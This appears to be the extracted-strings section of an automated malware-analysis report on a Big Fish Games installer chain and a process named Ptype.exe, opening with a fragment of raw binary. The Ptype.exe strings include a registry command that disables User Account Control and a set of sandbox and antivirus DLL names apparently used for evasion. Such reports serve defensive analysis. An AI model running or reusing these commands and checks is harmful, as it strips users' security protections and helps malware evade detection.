.O..O.G:.u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x......3......S....x......................A.3...$....h.....D$.j.P..S.
<<
<<< skipped >>>
Map
Strings from Dumps
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE_1648:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
tDSSh
tDSSh
%s %s
%s %s
... %d%%
... %d%%
verifying installer: %d%%
verifying installer: %d%%
ADVAPI32.dll
ADVAPI32.dll
~nsu.tmp\
~nsu.tmp\
shlwapi.dll
shlwapi.dll
%u.%u%s%s
%u.%u%s%s
KERNEL32.dll
KERNEL32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
*?|<>/":
*?|<>/":
\wininit.ini
\wininit.ini
%s=%s
%s=%s
%Program Files%
%Program Files%
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegDeleteKeyA
RegDeleteKeyA
RegCloseKey
RegCloseKey
RegEnumKeyA
RegEnumKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
Au_.exe
Au_.exe
RichEd20.dll
RichEd20.dll
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
PLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
PLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
\System.dll
\System.dll
Thawte Certification1
Thawte Certification1
http://ocsp.thawte.com0
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
http://ts-ocsp.ws.symantec.com07
http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<</pre><pre> http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(</pre><pre>2Terms of use at https://www.verisign.com/rpa (c)101.0,</pre><pre>/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D</pre><pre>https://www.verisign.com/rpa0</pre><pre>http://ocsp.verisign.com0;</pre><pre>/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0</pre><pre><VeriSign Class 3="3" Public Primary Certification Authority - G50><pre>https://www.verisign.com/cps0*</pre><pre>#http://logo.verisign.com/vslogo.gif04</pre><pre>#http://crl.verisign.com/pca3-g5.crl04</pre><pre>http://ocsp.verisign.com0</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp</pre><pre>nsi2.tmp</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>XR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE"</pre><pre>HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>4! # #%%$#</pre><pre>J(.Bu</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v06-Dec-2010.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>3.3.0.2</pre><pre>04090000</pre><pre>04070000</pre><b>HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe_1128:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>RegDeleteKeyExW</pre><pre>Kernel32.DLL</pre><pre>PSAPI.DLL</pre><pre>%s=%s</pre><pre>GetWindowsDirectoryW</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationW</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegEnumKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegCreateKeyExW</pre><pre>ADVAPI32.dll</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>2 2034383@3</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>nsProcess.dll</pre><pre>;#;7;`;};</pre><pre>KERNEL32.DLL</pre><pre>NTDLL.DLL</pre><pre>Run-Time Check Failure #%d - %s</pre><pre>Kernel32.dll</pre><pre>MSPDB71.DLL</pre><pre>IMAGEHLP.DLL</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.DLL</pre><pre>mscoree.dll</pre><pre>Client hook allocation failure at file %hs line %d.</pre><pre>_CrtCheckMemory()</pre><pre>_CrtIsValidHeapPointer(pUserData)</pre><pre>Client hook re-allocation failure at file %hs line %d.</pre><pre>DAMAGE: after %hs block (#%d) at 0x%p.</pre><pre>DAMAGE: before %hs block (#%d) at 0x%p.</pre><pre>%hs allocated at file %hs(%d).</pre><pre>_CrtMemCheckPoint: NULL state pointer.</pre><pre>_CrtMemDifference: NULL state pointer.</pre><pre>crt block at 0x%p, subtype %x, %Iu bytes long.</pre><pre>client block at 0x%p, subtype %x, %Iu bytes long.</pre><pre>%hs(%d) :</pre><pre>#File Error#(%d) :</pre><pre>Data: <%s> %s</pre><pre>- This application cannot run using the active version of the Microsoft .NET Runtime</pre><pre>Please contact the application's support team for more information.</pre><pre>%s(%d) : %s</pre><pre>_CrtDbgReport: String too long or IO Error</pre><pre>Second Chance Assertion Failed: File %s, Line %d</pre><pre>user32.dll</pre><pre>Debug %s!</pre><pre>Program: %s%s%s%s%s%s%s%s%s%s%s</pre><pre>internal state. The program cannot safely continue execution and must</pre><pre>continue execution and must now be terminated.</pre><pre>GetProcessWindowStation</pre><pre>f:\vs70builds\3077\vc\crtbld\crt\src\sprintf.c</pre><pre>f:\vs70builds\307</pre><pre>6q2.EC</pre><pre>.ssXV</pre><pre>)-.Yln</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>verifying installer: %d%%</pre><pre>... %d%%</pre><pre>http://nsis.sf.net/NSIS_Error</pre><pre>~nsu.tmp</pre><pre>%u.%u%s%s</pre><pre>.DEFAULT\Control Panel\International</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>*?|<>/":</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl8.tmp</pre><pre>inetc.dll</pre><pre>nning '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre>id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>me_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce<id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp\inetc.dll</pre><pre>><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>Execute: "%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe</pre><pre>nts and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>tdown<transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>EID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}</pre><pre>sion="1.0" encoding="utf-16" ?><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers></message></bfg></pre><pre>7P9MT7EX72W..exe</pre><pre>1397743395</pre><pre>wnload, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>FG_Monitor_f8c5f096-93d6-4f5f-8474-fc53d9c7540c</pre><pre>sage><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy6.tmp</pre><pre>><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></message></bfg></pre><pre>bfggameservices.exe</pre><pre>?xml version="1.0" encoding="utf-16" ?><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></message></bfg></pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub</pre><pre>HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>571081478</pre><pre>cceeded with download, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>{"IDENTIFIER":"0", "IDENTIFIER_TYPE":"DOWNLOADID", "CURRENT_SITEID":"", "CURRENT_LANGUAGEID":"", "STUB_LANGUAGEID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}</pre><pre>{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}</pre><pre>3.3.0.2</pre><pre>04090000</pre><b>Ptype.exe_1144:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: exported symbol not found</pre><pre>kernel32.dll</pre><pre>76487-644-3177037-23510</pre><pre>55274-640-2673064-23950</pre><pre>sbiedll.dll</pre><pre>dbghelp.dll</pre><pre>RLHOOK32.DLL</pre><pre>snxhk.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>ntdll.dll</pre><pre>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f</pre><pre>%sysdir%\</pre><pre>%sysdir%</pre><pre>~a39.log</pre><pre>cmd_.bat</pre><pre>sevane.tmp</pre><pre>user32.dll</pre><pre>cmd.dll</pre><pre>~a21524.log</pre><pre>GetProcessHeap</pre><pre>oleaut32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>wsock32.dll</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>7'7 7/73777;7?7!8<8</pre><pre>KWindows</pre><pre>66006666</pre><b>bfgsetup_s1_l1.exe_1796:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>tDSSh</pre><pre>%s %s</pre><pre>... %d%%</pre><pre>verifying installer: %d%%</pre><pre>ADVAPI32.dll</pre><pre>~nsu.tmp\</pre><pre>shlwapi.dll</pre><pre>%u.%u%s%s</pre><pre>KERNEL32.dll</pre><pre>.DEFAULT\Control Panel\International</pre><pre>*?|<>/":</pre><pre>\wininit.ini</pre><pre>%s=%s</pre><pre>%Program Files%</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>GetWindowsDirectoryA</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>RegDeleteKeyA</pre><pre>RegCloseKey</pre><pre>RegEnumKeyA</pre><pre>RegOpenKeyExA</pre><pre>RegCreateKeyExA</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>Au_.exe</pre><pre>RichEd20.dll</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>/STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>gsetup_s1_l1.exe</pre><pre>ALS~1\Temp\nsxA.tmp\System.dll</pre><pre>Thawte Certification1</pre><pre>http://ocsp.thawte.com0</pre><pre>.http://crl.thawte.com/ThawteTimestampingCA.crl0</pre><pre>http://ts-ocsp.ws.symantec.com07</pre><pre> http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<</pre><pre> http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(</pre><pre>2Terms of use at https://www.verisign.com/rpa (c)101.0,</pre><pre>/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D</pre><pre>https://www.verisign.com/rpa0</pre><pre>http://ocsp.verisign.com0;</pre><pre>/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0</pre><pre><VeriSign Class 3="3" Public Primary Certification Authority - G50><pre>https://www.verisign.com/cps0*</pre><pre>#http://logo.verisign.com/vslogo.gif04</pre><pre>#http://crl.verisign.com/pca3-g5.crl04</pre><pre>http://ocsp.verisign.com0</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxA.tmp</pre><pre>nsxA.tmp</pre><pre>TH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>d Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>bfgsetup_s1_l1.exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr9.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>4! # #%%$#</pre><pre>J(.Bu</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v06-Dec-2010.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>3.3.0.2</pre><pre>04090000</pre><pre>04070000</pre><b>bfgsetup_s1_l1.exe_552:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>RegDeleteKeyExW</pre><pre>Kernel32.DLL</pre><pre>PSAPI.DLL</pre><pre>%s=%s</pre><pre>GetWindowsDirectoryW</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationW</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegEnumKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegCreateKeyExW</pre><pre>ADVAPI32.dll</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>7%0xO</pre><pre>u: %d/%d trang...Kh</pre><pre>m.&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...</pre><pre>%dHTML</pre><pre>&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...</pre><pre>.reloc</pre><pre>8)u%f</pre><pre>AccessControl.dll</pre><pre>ClearOnRegKey</pre><pre>DenyOnRegKey</pre><pre>DisableRegKeyInheritance</pre><pre>EnableRegKeyInheritance</pre><pre>GetRegKeyGroup</pre><pre>GetRegKeyOwner</pre><pre>GrantOnRegKey</pre><pre>RevokeOnRegKey</pre><pre>SetOnRegKey</pre><pre>SetRegKeyGroup</pre><pre>SetRegKeyOwner</pre><pre>.text1</pre><pre>.adata</pre><pre>.data1</pre><pre>.pdata</pre><pre>4! # #%%$#</pre><pre>J(.Bu</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>verifying installer: %d%%</pre><pre>unpacking data: %d%%</pre><pre>... %d%%</pre><pre>http://nsis.sf.net/NSIS_Error</pre><pre>~nsu.tmp</pre><pre>%u.%u%s%s</pre><pre>.DEFAULT\Control Panel\International</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>*?|<>/":</pre><pre>ent.exe</pre><pre>OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp\System.dll</pre><pre>ol.dll</pre><pre>og\gamemanager_install_log.txt</pre><pre>scD.tmp</pre><pre>OCALS~1\Temp\nscD.tmp\System.dll</pre><pre>er.bmp</pre><pre>EnumerateSubKeys</pre><pre>CreateSubKey</pre><pre>GenericExecute</pre><pre>Cannot apply new access control list. Error code: %d</pre><pre>Cannot build new access control list. Error code: %d</pre><pre>Cannot read access control list. Error code: %d</pre><pre>Bad permission flags (%s)</pre><pre>Bad trustee (%s)</pre><pre>Cannot change access control list inheritance. Error code: %d</pre><pre>Cannot apply new ownership. Error code: %d</pre><pre>Cannot open process token. Error code: %d</pre><pre>Bug: Unsupported change mode: %d</pre><pre>Cannot look up owner. Error code: %d</pre><pre>Cannot get current ownership. Error code: %d</pre><pre>Root key name missing</pre><pre>Registry key name missing</pre><pre>Bad root key name (%s)</pre><pre>Couldn't lookup current user name. Error code %d:</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp</pre><pre>nscD.tmp</pre><pre>\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>STUBPATH 